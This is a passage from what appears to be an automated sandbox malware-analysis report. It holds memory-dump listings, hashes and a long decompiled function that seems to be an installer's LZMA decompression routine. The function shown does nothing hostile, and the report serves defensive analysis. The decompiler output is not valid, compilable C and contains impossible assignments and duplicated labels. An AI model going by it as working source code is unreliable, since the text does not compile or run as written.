                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                                                                                                                                                            • Instruction ID: 63ee65aff5d1ea53a99bb7455827a561e54e570c364fe5978cc4b9ff32097947
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                                                                                                                                                            • Instruction Fuzzy Hash: E9711271D04228CBDF24CFA8C8547ADBBF1FB48305F15806AD856BB281D7786A96DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E00406701() {
                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                            				void _t533;
                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                            				void* _t613;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                            						 *(_t613 - 0x84) = 0xb;
                                                                                                                                                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                            						goto L132;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eax =  *(__ebp - 0x28);
                                                                                                                                                                            						L88:
                                                                                                                                                                            						 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            						L89:
                                                                                                                                                                            						__eax =  *(__ebp - 4);
                                                                                                                                                                            						 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            						L69:
                                                                                                                                                                            						 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L132:
                                                                                                                                                                            							 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L133:
                                                                                                                                                                            								_t531 =  *_t606;
                                                                                                                                                                            								_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                            								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                            									 *(_t613 - 0x40) = 1;
                                                                                                                                                                            									_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            									 *_t606 = _t532;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *(_t613 - 0x10) = _t565;
                                                                                                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                            								}
                                                                                                                                                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                            									goto L139;
                                                                                                                                                                            								}
                                                                                                                                                                            								L137:
                                                                                                                                                                            								if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            									 *(_t613 - 0x88) = 5;
                                                                                                                                                                            									L170:
                                                                                                                                                                            									_t568 = 0x22;
                                                                                                                                                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                            									_t535 = 0;
                                                                                                                                                                            									L172:
                                                                                                                                                                            									return _t535;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            								L139:
                                                                                                                                                                            								_t533 =  *(_t613 - 0x84);
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										L1:
                                                                                                                                                                            										_t534 =  *(_t613 - 0x88);
                                                                                                                                                                            										if(_t534 > 0x1c) {
                                                                                                                                                                            											break;
                                                                                                                                                                            										}
                                                                                                                                                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
                                                                                                                                                                            											case 0:
                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            												_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                            												if(_t534 > 0xe1) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t538 = _t534 & 0x000000ff;
                                                                                                                                                                            												_push(0x2d);
                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                            												_pop(_t570);
                                                                                                                                                                            												_push(9);
                                                                                                                                                                            												_pop(_t571);
                                                                                                                                                                            												_t609 = _t538 / _t570;
                                                                                                                                                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                            												 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                            													L10:
                                                                                                                                                                            													if(_t612 == 0) {
                                                                                                                                                                            														L12:
                                                                                                                                                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            														goto L15;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L11;
                                                                                                                                                                            													}
                                                                                                                                                                            													do {
                                                                                                                                                                            														L11:
                                                                                                                                                                            														_t612 = _t612 - 1;
                                                                                                                                                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                            													} while (_t612 != 0);
                                                                                                                                                                            													goto L12;
                                                                                                                                                                            												}
                                                                                                                                                                            												if( *(_t613 - 4) != 0) {
                                                                                                                                                                            													GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                                            												}
                                                                                                                                                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            												 *(_t613 - 4) = _t534;
                                                                                                                                                                            												if(_t534 == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                            													goto L10;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 1:
                                                                                                                                                                            												L13:
                                                                                                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            													 *(_t613 - 0x88) = 1;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            												_t45 = _t613 - 0x48;
                                                                                                                                                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                            												__eflags =  *_t45;
                                                                                                                                                                            												L15:
                                                                                                                                                                            												if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                            													goto L13;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t546 =  *(_t613 - 0x40);
                                                                                                                                                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                            													L20:
                                                                                                                                                                            													 *(_t613 - 0x48) = 5;
                                                                                                                                                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            													goto L23;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t613 - 0x74) = _t546;
                                                                                                                                                                            												if( *(_t613 - 8) != 0) {
                                                                                                                                                                            													GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                                            												}
                                                                                                                                                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                            												 *(_t613 - 8) = _t534;
                                                                                                                                                                            												if(_t534 == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L20;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 2:
                                                                                                                                                                            												L24:
                                                                                                                                                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                            												 *(_t613 - 0x84) = 6;
                                                                                                                                                                            												 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                            												L132:
                                                                                                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            												goto L133;
                                                                                                                                                                            											case 3:
                                                                                                                                                                            												L21:
                                                                                                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                            													 *(_t613 - 0x88) = 3;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                            												_t67 = _t613 - 0x70;
                                                                                                                                                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                            												__eflags =  *_t67;
                                                                                                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L23:
                                                                                                                                                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                            												if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                            													goto L21;
                                                                                                                                                                            												}
                                                                                                                                                                            												goto L24;
                                                                                                                                                                            											case 4:
                                                                                                                                                                            												L133:
                                                                                                                                                                            												_t531 =  *_t606;
                                                                                                                                                                            												_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                            												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                            													 *(_t613 - 0x40) = 1;
                                                                                                                                                                            													_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            													 *_t606 = _t532;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(_t613 - 0x10) = _t565;
                                                                                                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                            												}
                                                                                                                                                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L139;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 5:
                                                                                                                                                                            												goto L137;
                                                                                                                                                                            											case 6:
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														L132:
                                                                                                                                                                            														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            														goto L133;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                                                                                                            												__cl = 8;
                                                                                                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            														_t98 = __ebp - 0x38;
                                                                                                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            														__eflags =  *_t98;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            													}
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                            													goto L61;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            													}
                                                                                                                                                                            													__ecx =  *(__ebp - 8);
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            													goto L41;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 7:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            												if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                            													 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            													__eax =  *(__ebp - 0x28);
                                                                                                                                                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            													__eax = 0;
                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            													__al = __al & 0x000000fd;
                                                                                                                                                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            													goto L69;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 8;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L132:
                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 8:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                                                                                                            													__ecx =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            												}
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L132:
                                                                                                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 9:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													goto L89;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            												__eflags = _t259;
                                                                                                                                                                            												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                            												goto L76;
                                                                                                                                                                            											case 0xa:
                                                                                                                                                                            												goto L0;
                                                                                                                                                                            											case 0xb:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            												goto L88;
                                                                                                                                                                            											case 0xc:
                                                                                                                                                                            												L99:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t334 = __ebp - 0x70;
                                                                                                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t334;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												goto L101;
                                                                                                                                                                            											case 0xd:
                                                                                                                                                                            												L37:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t122 = __ebp - 0x70;
                                                                                                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t122;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L39:
                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            													goto L48;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													goto L54;
                                                                                                                                                                            												}
                                                                                                                                                                            												L41:
                                                                                                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__eax = __eax << 8;
                                                                                                                                                                            												__eax = __eax + __ebx;
                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edx;
                                                                                                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L39;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L37;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0xe:
                                                                                                                                                                            												L46:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t156 = __ebp - 0x70;
                                                                                                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t156;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L48:
                                                                                                                                                                            													__eflags = __ebx - 0x100;
                                                                                                                                                                            													if(__ebx >= 0x100) {
                                                                                                                                                                            														break;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													__edx = __ebx + __ebx;
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            													__esi = __edx + __eax;
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
